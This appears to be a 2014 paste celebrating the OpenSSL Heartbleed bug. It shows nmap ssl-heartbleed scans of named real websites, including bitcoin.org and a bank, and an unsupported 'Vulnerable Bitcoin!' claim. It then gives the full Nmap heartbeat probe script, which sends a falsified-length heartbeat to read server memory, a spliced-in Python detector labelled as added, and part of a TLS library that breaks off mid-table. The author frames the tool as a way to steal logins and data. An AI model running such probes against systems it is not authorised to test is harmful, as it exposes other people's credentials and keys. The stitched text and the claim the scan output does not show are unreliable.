Mayk0

SSL Heartbleed / 0day - Inj3ct0r / Mayk0

Apr 14th, 2014
Mayk0@kali:~# nmap -PO -sT -p443 --script=ssl-heartbleed www.bitcoing

Starting Nmap 6.40 ( http://nmap.org/ ) at 2014-04-14 05:07 CEST
Nmap scan report for www.bitcoin.org (88.198.199.140)
Host is up (0.037s latency).
rDNS record for 88.198.199.140: static.88-198-199-140.clients.your-server.de
PORT    STATE SERVICE
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 22.21 seconds

Happy Pentesting! Vulnerable Bitcoin!~

Just download https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse and put it in (.../nmap/script/), where the files with the .nse extension are. Then go and download http://nmap.org/nsedoc/lib/tls.html and put it in (.../nmap/nselib/) with the .lua extension ....... & voilà! Hahaha

Basically, so that some people understand it: logins or form data can be pulled out over SSL. In other words, thanks to this we can steal a lot of very valuable information!

=====================================

https://www.commbank.com.au/blog/what-you-need-to-know-about-heartbleed.html

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 14 Apr 2014 09:00:39 GMT
Location: https://www.commbank.com.au/
Server: Apache/2.2.3 (Red Hat)
Strict-Transport-Security: max-age=31536000
Connection: Close

http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-40007/Apache-Http-Server-2.2.3.html

Host is up (0.40s latency).
rDNS record for 54.252.129.251: ec2-54-252-129-251.ap-southeast-2.compute.amazonaws.com
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

=========================================================
ssl-heartbleed.nse

description = [[
Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).
The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
]]

---
-- @usage
-- nmap -p 443 --script ssl-heartbleed <target>
--
-- @output
-- PORT    STATE SERVICE
-- 443/tcp open  https
-- | ssl-heartbleed:
-- |   VULNERABLE:
-- |   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
-- |
-- |     References:
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
-- |       http://www.openssl.org/news/secadv_20140407.txt
-- |_      http://cvedetails.com/cve/2014-0160/
--
--
-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2
--

local bin = require('bin')
local match = require('match')
local nmap = require('nmap')
local shortport = require('shortport')
local sslcert = require('sslcert')
local stdnse = require('stdnse')
local string = require('string')
local table = require('table')
local vulns = require('vulns')
local have_tls, tls = pcall(require,'tls')
assert(have_tls, "This script requires the tls.lua library from http://nmap.org/nsedoc/lib/tls.html")

author = "Patrik Karlsson <patrik@cqure.net>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = { "vuln", "safe" }

local arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}

portrule = function(host, port)
  return shortport.ssl(host, port) or sslcert.isPortSupported(port)
end

-- Read the 5-byte TLS record header: content type, version, length
local function recvhdr(s)
  local status, hdr = s:receive_buf(match.numbytes(5), true)
  if not status then
    stdnse.print_debug(3, 'Unexpected EOF receiving record header - server closed connection')
    return
  end
  local pos, typ, ver, ln = bin.unpack('>CSS', hdr)
  return status, typ, ver, ln
end

-- Read len bytes of record payload
local function recvmsg(s, len)
  local status, pay = s:receive_buf(match.numbytes(len), true)
  if not status then
    stdnse.print_debug(3, 'Unexpected EOF receiving record payload - server closed connection')
    return
  end
  return true, pay
end

local function keys(t)
  local ret = {}
  for k, _ in pairs(t) do
    ret[#ret+1] = k
  end
  return ret
end

local function testversion(host, port, version)

  local hello = tls.client_hello({
      ["protocol"] = version,
      -- Claim to support every cipher
      -- Doesn't work with IIS, but IIS isn't vulnerable
      ["ciphers"] = keys(tls.CIPHERS),
      ["compressors"] = {"NULL"},
      ["extensions"] = {
        -- Claim to support every elliptic curve
        ["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](keys(tls.ELLIPTIC_CURVES)),
        -- Claim to support every EC point format
        ["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](keys(tls.EC_POINT_FORMATS)),
        ["heartbeat"] = "\x01", -- peer_not_allowed_to_send
      },
    })

  local payload = "Nmap ssl-heartbleed"
  local hb = tls.record_write("heartbeat", version, bin.pack("C>SA",
      1, -- HeartbeatMessageType heartbeat_request
      0x4000, -- payload length (falsified)
      -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet
      -- header + 1 to overflow
      payload -- less than payload length.
      )
    )

  local s
  local specialized = sslcert.getPrepareTLSWithoutReconnect(port)
  if specialized then
    local status
    status, s = specialized(host, port)
    if not status then
      stdnse.print_debug(3, "Connection to server failed")
      return
    end
  else
    s = nmap.new_socket()
    local status = s:connect(host, port)
    if not status then
      stdnse.print_debug(3, "Connection to server failed")
      return
    end
  end

  s:set_timeout(5000)

  -- Send Client Hello to the target server
  local status, err = s:send(hello)
  if not status then
    stdnse.print_debug("Couldn't send Client Hello: %s", err)
    s:close()
    return nil
  end

  -- Read response
  local done = false
  local supported = false
  local i = 1
  local response
  repeat
    status, response, err = tls.record_buffer(s, response, i)
    if err == "TIMEOUT" then
      -- Timed out while waiting for server_hello_done
      -- Could be client certificate required or other message required
      -- Let's just drop out and try sending the heartbeat anyway.
      done = true
      break
    elseif not status then
      stdnse.print_debug("Couldn't receive: %s", err)
      s:close()
      return nil
    end

    local record
    i, record = tls.record_read(response, i)
    if record == nil then
      stdnse.print_debug("%s: Unknown response from server", SCRIPT_NAME)
      s:close()
      return nil
    elseif record.protocol ~= version then
      stdnse.print_debug("%s: Protocol version mismatch", SCRIPT_NAME)
      s:close()
      return nil
    end

    if record.type == "handshake" then
      for _, body in ipairs(record.body) do
        if body.type == "server_hello" then
          if body.extensions and body.extensions["heartbeat"] == "\x01" then
            supported = true
          end
        elseif body.type == "server_hello_done" then
          stdnse.print_debug("we're done!")
          done = true
        end
      end
    end
  until done
  if not supported then
    stdnse.print_debug("%s: Server does not support TLS Heartbeat Requests.", SCRIPT_NAME)
    s:close()
    return nil
  end

  status, err = s:send(hb)
  if not status then
    stdnse.print_debug("Couldn't send heartbeat request: %s", err)
    s:close()
    return nil
  end
  while(true) do
    local status, typ, ver, len = recvhdr(s)
    if not status then
      stdnse.print_debug(1, 'No heartbeat response received, server likely not vulnerable')
      break
    end
    if typ == 24 then
      local pay
      status, pay = recvmsg(s, 0x0fe9)
      s:close()
      -- recvmsg returns nothing on a failed read, so check status before
      -- taking the length of pay
      if status and #pay > 3 then
        return true
      else
        stdnse.print_debug(1, 'Server processed malformed heartbeat, but did not return any extra data.')
        break
      end
    elseif typ == 21 then
      stdnse.print_debug(1, 'Server returned error, likely not vulnerable')
      break
    end
  end

end

action = function(host, port)
  local vuln_table = {
    title = "The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
    ]],

    references = {
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',
      'http://www.openssl.org/news/secadv_20140407.txt ',
      'http://cvedetails.com/cve/2014-0160/'
    }
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local test_vers = arg_protocols

  if type(test_vers) == 'string' then
    test_vers = { test_vers }
  end

  for _, ver in ipairs(test_vers) do
    if nil == tls.PROTOCOLS[ver] then
      return "\n Unsupported protocol version: " .. ver
    end
    local status = testversion(host, port, ver)
    if ( status ) then
      vuln_table.state = vulns.STATE.VULN
      break
    end
  end

  return report:make_output(vuln_table)
end
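
Added example, not part of the paste or of Nmap's code: a receiver-side check over cleartext TLS records that applies the RFC 6520 length rule (message type + payload_length + payload + at least 16 bytes of padding must fit inside the record) and flags a heartbeat like the one the script builds, where payload_length is 0x4000 but only 19 payload bytes follow. The capture bytes and all function names are constructed for illustration; heartbeats sent after encryption starts hide these fields, so this applies only to cleartext records such as the script's probe.

```python
import struct

HEARTBEAT = 24      # TLS content type "heartbeat" (same value as in tls.lua)
HB_HEADER = 3       # 1-byte message type + 2-byte payload_length
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding


def tls_record(content_type, version, fragment):
    """Build one TLS record; used only to construct the sample capture."""
    return struct.pack(">BHH", content_type, version, len(fragment)) + fragment


def iter_records(stream):
    """Yield (content_type, version, fragment) for each complete record."""
    pos = 0
    while pos + 5 <= len(stream):
        content_type, version, length = struct.unpack_from(">BHH", stream, pos)
        fragment = stream[pos + 5:pos + 5 + length]
        if len(fragment) < length:
            break  # capture ends in the middle of a record
        yield content_type, version, fragment
        pos += 5 + length


def check_heartbeat(fragment):
    """Return None for a well-formed heartbeat, else the reason to drop it."""
    if len(fragment) < HB_HEADER:
        return "heartbeat shorter than its 3-byte header"
    _msg_type, claimed = struct.unpack_from(">BH", fragment, 0)
    # The claimed payload plus mandatory padding must fit in what was received.
    if HB_HEADER + claimed + MIN_PADDING > len(fragment):
        return "payload_length %d does not fit in a %d-byte record" % (
            claimed, len(fragment))
    return None


def scan(stream):
    """Return [(record_index, reason)] for malformed heartbeats in stream."""
    findings = []
    for index, (content_type, _version, fragment) in enumerate(iter_records(stream)):
        if content_type != HEARTBEAT:
            continue
        reason = check_heartbeat(fragment)
        if reason is not None:
            findings.append((index, reason))
    return findings


# Constructed sample capture (TLS 1.1, cleartext records).
PAYLOAD = b"Nmap ssl-heartbleed"
# Stand-in handshake record; its content is a placeholder and is not parsed.
HANDSHAKE = tls_record(22, 0x0302, b"\x01\x00\x00\x00")
# Heartbeat shaped like the script's request: claims 0x4000 bytes, no padding.
PROBE = tls_record(HEARTBEAT, 0x0302, struct.pack(">BH", 1, 0x4000) + PAYLOAD)
# Well-formed heartbeat: true payload length followed by 16 bytes of padding.
HONEST = tls_record(
    HEARTBEAT, 0x0302,
    struct.pack(">BH", 1, len(PAYLOAD)) + PAYLOAD + bytes(MIN_PADDING))
SAMPLE = HANDSHAKE + PROBE + HONEST

if __name__ == "__main__":
    for index, reason in scan(SAMPLE):
        print("record %d: %s" % (index, reason))
```

A peer that applies this check drops the malformed request without answering, which is the outcome the script reports as "likely not vulnerable".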
==========================================================================
Library tls

A library providing functions for doing TLS/SSL communications

These functions will build strings and process buffers. Socket communication is left to the script to implement.

Author:
"Daniel Miller <bonsaiviking@gmail.com>"
Source: http://nmap.org/svn/nselib/tls.lua

Functions

client_hello (t)
Build a client_hello message

record_buffer (sock, buffer, i)
Get an entire record into a buffer

record_read (buffer, i)
Read a SSL/TLS record

record_write (type, protocol, b)
Build a SSL/TLS record

==========================================================================
tls.lua

---
-- A library providing functions for doing TLS/SSL communications
--
-- These functions will build strings and process buffers. Socket communication
-- is left to the script to implement.
--
-- @author "Daniel Miller <bonsaiviking@gmail.com>"

local stdnse = require "stdnse"
local bin = require "bin"
local os = require "os"
local table = require "table"
_ENV = stdnse.module("tls", stdnse.seeall)

-- Most of the values in the tables below are from:
-- http://www.iana.org/assignments/tls-parameters/
PROTOCOLS = {
  ["SSLv3"] = 0x0300,
  ["TLSv1.0"] = 0x0301,
  ["TLSv1.1"] = 0x0302,
  ["TLSv1.2"] = 0x0303
}

--
-- TLS Record Types
--
TLS_RECORD_HEADER_LENGTH = 5

TLS_CONTENTTYPE_REGISTRY = {
  ["change_cipher_spec"] = 20,
  ["alert"] = 21,
  ["handshake"] = 22,
  ["application_data"] = 23,
  ["heartbeat"] = 24
}

--
-- TLS Alert Levels
--
TLS_ALERT_LEVELS = {
  ["warning"] = 1,
  ["fatal"] = 2,
}

--
-- TLS Alert Record Types
--
TLS_ALERT_REGISTRY = {
  ["close_notify"] = 0,
  ["unexpected_message"] = 10,
  ["bad_record_mac"] = 20,
  ["decryption_failed"] = 21,
  ["record_overflow"] = 22,
  ["decompression_failure"] = 30,
  ["handshake_failure"] = 40,
  ["no_certificate"] = 41,
  ["bad_certificate"] = 42,
  ["unsupported_certificate"] = 43,
  ["certificate_revoked"] = 44,
  ["certificate_expired"] = 45,
  ["certificate_unknown"] = 46,
  ["illegal_parameter"] = 47,
  ["unknown_ca"] = 48,
  ["access_denied"] = 49,
  ["decode_error"] = 50,
  ["decrypt_error"] = 51,
  ["export_restriction"] = 60,
  ["protocol_version"] = 70,
  ["insufficient_security"] = 71,
  ["internal_error"] = 80,
  ["user_canceled"] = 90,
  ["no_renegotiation"] = 100,
  ["unsupported_extension"] = 110,
  ["certificate_unobtainable"] = 111,
  ["unrecognized_name"] = 112,
  ["bad_certificate_status_response"] = 113,
  ["bad_certificate_hash_value"] = 114,
  ["unknown_psk_identity"] = 115
}

--
-- TLS Handshake Record Types
--
TLS_HANDSHAKETYPE_REGISTRY = {
  ["hello_request"] = 0,
  ["client_hello"] = 1,
  ["server_hello"] = 2,
  ["hello_verify_request"] = 3,
  ["NewSessionTicket"] = 4,
  ["certificate"] = 11,
  ["server_key_exchange"] = 12,
  ["certificate_request"] = 13,
  ["server_hello_done"] = 14,
  ["certificate_verify"] = 15,
  ["client_key_exchange"] = 16,
  ["finished"] = 20,
  ["certificate_url"] = 21,
  ["certificate_status"] = 22,
  ["supplemental_data"] = 23,
  ["next_protocol"] = 67,
}

--
-- Compression Algorithms
-- http://www.iana.org/assignments/comp-meth-ids
--
COMPRESSORS = {
  ["NULL"] = 0,
  ["DEFLATE"] = 1,
  ["LZS"] = 64
}

---
-- RFC 4492 section 5.1.1 "Supported Elliptic Curves Extension".
ELLIPTIC_CURVES = {
  sect163k1 = 1,
  sect163r1 = 2,
  sect163r2 = 3,
  sect193r1 = 4,
  sect193r2 = 5,
  sect233k1 = 6,
  sect233r1 = 7,
  sect239k1 = 8,
  sect283k1 = 9,
  sect283r1 = 10,
  sect409k1 = 11,
  sect409r1 = 12,
  sect571k1 = 13,
  sect571r1 = 14,
  secp160k1 = 15,
  secp160r1 = 16,
  secp160r2 = 17,
  secp192k1 = 18,
  secp192r1 = 19,
  secp224k1 = 20,
  secp224r1 = 21,
  secp256k1 = 22,
  secp256r1 = 23,
  secp384r1 = 24,
  secp521r1 = 25,
  arbitrary_explicit_prime_curves = 0xFF01,
  arbitrary_explicit_char2_curves = 0xFF02,
}

---
-- RFC 4492 section 5.1.2 "Supported Point Formats Extension".
EC_POINT_FORMATS = {
  uncompressed = 0,
  ansiX962_compressed_prime = 1,
  ansiX962_compressed_char2 = 2,
}

---
-- Extensions
-- RFC 6066, draft-agl-tls-nextprotoneg-03
-- https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml
--
EXTENSIONS = {
  ["server_name"] = 0,
  ["max_fragment_length"] = 1,
  ["client_certificate_url"] = 2,
  ["trusted_ca_keys"] = 3,
  ["truncated_hmac"] = 4,
  ["status_request"] = 5,
  ["user_mapping"] = 6,
  ["client_authz"] = 7,
  ["server_authz"] = 8,
  ["cert_type"] = 9,
  ["elliptic_curves"] = 10,
  ["ec_point_formats"] = 11,
  ["srp"] = 12,
  ["signature_algorithms"] = 13,
  ["use_srtp"] = 14,
  ["heartbeat"] = 15,
  ["application_layer_protocol_negotiation"] = 16,
  ["status_request_v2"] = 17,
  ["signed_certificate_timestamp"] = 18,
  ["client_certificate_type"] = 19,
  ["server_certificate_type"] = 20,
  ["padding"] = 21, -- Temporary, expires 2015-03-12
  ["SessionTicket TLS"] = 35,
  ["next_protocol_negotiation"] = 13172,
  ["renegotiation_info"] = 65281,
}

---
-- Builds data for each extension
-- Defaults to tostring (i.e. pass in the packed data you want directly)
EXTENSION_HELPERS = {
  ["server_name"] = function (server_name)
    -- Only supports host_name type (0), as per RFC
    -- Support for other types could be added later
    return bin.pack(">P", bin.pack(">CP", 0, server_name))
  end,
  ["max_fragment_length"] = tostring,
  ["client_certificate_url"] = tostring,
  ["trusted_ca_keys"] = tostring,
  ["truncated_hmac"] = tostring,
  ["status_request"] = tostring,
  ["elliptic_curves"] = function (elliptic_curves)
    local list = {}
    for _, name in ipairs(elliptic_curves) do
      list[#list+1] = bin.pack(">S", ELLIPTIC_CURVES[name])
    end
    return bin.pack(">P", table.concat(list))
  end,
  ["ec_point_formats"] = function (ec_point_formats)
    local list = {}
    for _, format in ipairs(ec_point_formats) do
      list[#list+1] = bin.pack(">C", EC_POINT_FORMATS[format])
    end
    return bin.pack(">p", table.concat(list))
  end,
  ["next_protocol_negotiation"] = tostring,
}

--
-- Encryption Algorithms
--
CIPHERS = {
  ["TLS_NULL_WITH_NULL_NULL"] = 0x0000,
  ["TLS_RSA_WITH_NULL_MD5"] = 0x0001,
  ["TLS_RSA_WITH_NULL_SHA"] = 0x0002,
  ["TLS_RSA_EXPORT_WITH_RC4_40_MD5"] = 0x0003,
  ["TLS_RSA_WITH_RC4_128_MD5"] = 0x0004,
  ["TLS_RSA_WITH_RC4_128_SHA"] = 0x0005,
  ["TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"] = 0x0006,
  ["TLS_RSA_WITH_IDEA_CBC_SHA"] = 0x0007,
  ["TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x0008,
  ["TLS_RSA_WITH_DES_CBC_SHA"] = 0x0009,
  ["TLS_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x000A,
  ["TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"] = 0x000B,
  ["TLS_DH_DSS_WITH_DES_CBC_SHA"] = 0x000C,
  ["TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"] = 0x000D,
  ["TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x000E,
  ["TLS_DH_RSA_WITH_DES_CBC_SHA"] = 0x000F,
  ["TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x0010,
  ["TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"] = 0x0011,
  ["TLS_DHE_DSS_WITH_DES_CBC_SHA"] = 0x0012,
  ["TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"] = 0x0013,
  ["TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x0014,
  ["TLS_DHE_RSA_WITH_DES_CBC_SHA"] = 0x0015,
  ["TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x0016,
  ["TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"] = 0x0017,
  ["TLS_DH_anon_WITH_RC4_128_MD5"] = 0x0018,
  ["TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"] = 0x0019,
  ["TLS_DH_anon_WITH_DES_CBC_SHA"] = 0x001A,
  ["TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"] = 0x001B,
  ["SSL_FORTEZZA_KEA_WITH_NULL_SHA"] = 0x001C,
  ["SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"] = 0x001D,
  ["TLS_KRB5_WITH_DES_CBC_SHA-or-SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"] = 0x001E, --TLS vs SSLv3
  ["TLS_KRB5_WITH_3DES_EDE_CBC_SHA"] = 0x001F,
  ["TLS_KRB5_WITH_RC4_128_SHA"] = 0x0020,
  ["TLS_KRB5_WITH_IDEA_CBC_SHA"] = 0x0021,
  ["TLS_KRB5_WITH_DES_CBC_MD5"] = 0x0022,
  ["TLS_KRB5_WITH_3DES_EDE_CBC_MD5"] = 0x0023,
  ["TLS_KRB5_WITH_RC4_128_MD5"] = 0x0024,
  ["TLS_KRB5_WITH_IDEA_CBC_MD5"] = 0x0025,
  ["TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"] = 0x0026,
  ["TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"] = 0x0027,
  ["TLS_KRB5_EXPORT_WITH_RC4_40_SHA"] = 0x0028,
  ["TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"] = 0x0029,
  ["TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"] = 0x002A,
  ["TLS_KRB5_EXPORT_WITH_RC4_40_MD5"] = 0x002B,
  ["TLS_PSK_WITH_NULL_SHA"] = 0x002C,
  ["TLS_DHE_PSK_WITH_NULL_SHA"] = 0x002D,
  ["TLS_RSA_PSK_WITH_NULL_SHA"] = 0x002E,
  ["TLS_RSA_WITH_AES_128_CBC_SHA"] = 0x002F,
  ["TLS_DH_DSS_WITH_AES_128_CBC_SHA"] = 0x0030,
  ["TLS_DH_RSA_WITH_AES_128_CBC_SHA"] = 0x0031,
  ["TLS_DHE_DSS_WITH_AES_128_CBC_SHA"] = 0x0032,
  ["TLS_DHE_RSA_WITH_AES_128_CBC_SHA"] = 0x0033,
  ["TLS_DH_anon_WITH_AES_128_CBC_SHA"] = 0x0034,
  ["TLS_RSA_WITH_AES_256_CBC_SHA"] = 0x0035,
  ["TLS_DH_DSS_WITH_AES_256_CBC_SHA"] = 0x0036,
  ["TLS_DH_RSA_WITH_AES_256_CBC_SHA"] = 0x0037,
  ["TLS_DHE_DSS_WITH_AES_256_CBC_SHA"] = 0x0038,
  ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA"] = 0x0039,
  ["TLS_DH_anon_WITH_AES_256_CBC_SHA"] = 0x003A,
  ["TLS_RSA_WITH_NULL_SHA256"] = 0x003B,
  ["TLS_RSA_WITH_AES_128_CBC_SHA256"] = 0x003C,
  ["TLS_RSA_WITH_AES_256_CBC_SHA256"] = 0x003D,
  ["TLS_DH_DSS_WITH_AES_128_CBC_SHA256"] = 0x003E,
  ["TLS_DH_RSA_WITH_AES_128_CBC_SHA256"] = 0x003F,
  ["TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"] = 0x0040,
  ["TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0041,
  ["TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"] = 0x0042,
  ["TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0043,
  ["TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"] = 0x0044,
  ["TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0045,
  ["TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"] = 0x0046,
  ["TLS_ECDH_ECDSA_WITH_NULL_SHA-draft"] = 0x0047, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECDSA_WITH_RC4_128_SHA-draft"] = 0x0048, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECDSA_WITH_DES_CBC_SHA-draft"] = 0x0049, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x004A, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA-draft"] = 0x004B, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA-draft"] = 0x004C, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECNRA_WITH_DES_CBC_SHA-draft"] = 0x004D, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_ECNRA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x004E, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECDSA_NULL_SHA-draft"] = 0x004F, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECDSA_WITH_RC4_128_SHA-draft"] = 0x0050, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECDSA_WITH_DES_CBC_SHA-draft"] = 0x0051, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECDSA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x0052, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECNRA_NULL_SHA-draft"] = 0x0053, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECNRA_WITH_RC4_128_SHA-draft"] = 0x0054, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECNRA_WITH_DES_CBC_SHA-draft"] = 0x0055, --draft-ietf-tls-ecc-00
  ["TLS_ECMQV_ECNRA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x0056, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_NULL_WITH_SHA-draft"] = 0x0057, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_WITH_RC4_128_SHA-draft"] = 0x0058, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_WITH_DES_CBC_SHA-draft"] = 0x0059, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA-draft"] = 0x005A, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_EXPORT_WITH_DES40_CBC_SHA-draft"] = 0x005B, --draft-ietf-tls-ecc-00
  ["TLS_ECDH_anon_EXPORT_WITH_RC4_40_SHA-draft"] = 0x005C, --draft-ietf-tls-ecc-00
  ["TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"] = 0x0060,
  ["TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"] = 0x0061,
  ["TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"] = 0x0062,
  ["TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"] = 0x0063,
  ["TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"] = 0x0064,
  ["TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"] = 0x0065,
  ["TLS_DHE_DSS_WITH_RC4_128_SHA"] = 0x0066,
  ["TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"] = 0x0067,
  ["TLS_DH_DSS_WITH_AES_256_CBC_SHA256"] = 0x0068,
  ["TLS_DH_RSA_WITH_AES_256_CBC_SHA256"] = 0x0069,
  ["TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"] = 0x006A,
  ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"] = 0x006B,
  ["TLS_DH_anon_WITH_AES_128_CBC_SHA256"] = 0x006C,
  ["TLS_DH_anon_WITH_AES_256_CBC_SHA256"] = 0x006D,
  ["TLS_DHE_DSS_WITH_3DES_EDE_CBC_RMD"] = 0x0072, --draft-ietf-tls-openpgp-keys-05
  ["TLS_DHE_DSS_WITH_AES_128_CBC_RMD"] = 0x0073, --draft-ietf-tls-openpgp-keys-05
  ["TLS_DHE_DSS_WITH_AES_256_CBC_RMD"] = 0x0074, --draft-ietf-tls-openpgp-keys-05
  ["TLS_DHE_RSA_WITH_3DES_EDE_CBC_RMD"] = 0x0077, --draft-ietf-tls-openpgp-keys-05
  ["TLS_DHE_RSA_WITH_AES_128_CBC_RMD"] = 0x0078, --draft-ietf-tls-openpgp-keys-05
  ["TLS_DHE_RSA_WITH_AES_256_CBC_RMD"] = 0x0079, --draft-ietf-tls-openpgp-keys-05
  ["TLS_RSA_WITH_3DES_EDE_CBC_RMD"] = 0x007C, --draft-ietf-tls-openpgp-keys-05
  ["TLS_RSA_WITH_AES_128_CBC_RMD"] = 0x007D, --draft-ietf-tls-openpgp-keys-05
  ["TLS_RSA_WITH_AES_256_CBC_RMD"] = 0x007E, --draft-ietf-tls-openpgp-keys-05
  ["TLS_GOSTR341094_WITH_28147_CNT_IMIT"] = 0x0080, --draft-chudov-cryptopro-cptls-04
  ["TLS_GOSTR341001_WITH_28147_CNT_IMIT"] = 0x0081, --draft-chudov-cryptopro-cptls-04
  ["TLS_GOSTR341094_WITH_NULL_GOSTR3411"] = 0x0082, --draft-chudov-cryptopro-cptls-04
  ["TLS_GOSTR341001_WITH_NULL_GOSTR3411"] = 0x0083, --draft-chudov-cryptopro-cptls-04
  ["TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0084,
  ["TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"] = 0x0085,
  ["TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0086,
  ["TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"] = 0x0087,
  ["TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0088,
  ["TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"] = 0x0089,
  ["TLS_PSK_WITH_RC4_128_SHA"] = 0x008A,
  ["TLS_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x008B,
  ["TLS_PSK_WITH_AES_128_CBC_SHA"] = 0x008C,
  ["TLS_PSK_WITH_AES_256_CBC_SHA"] = 0x008D,
  ["TLS_DHE_PSK_WITH_RC4_128_SHA"] = 0x008E,
  ["TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x008F,
  ["TLS_DHE_PSK_WITH_AES_128_CBC_SHA"] = 0x0090,
  ["TLS_DHE_PSK_WITH_AES_256_CBC_SHA"] = 0x0091,
  ["TLS_RSA_PSK_WITH_RC4_128_SHA"] = 0x0092,
  ["TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"] = 0x0093,
  ["TLS_RSA_PSK_WITH_AES_128_CBC_SHA"] = 0x0094,
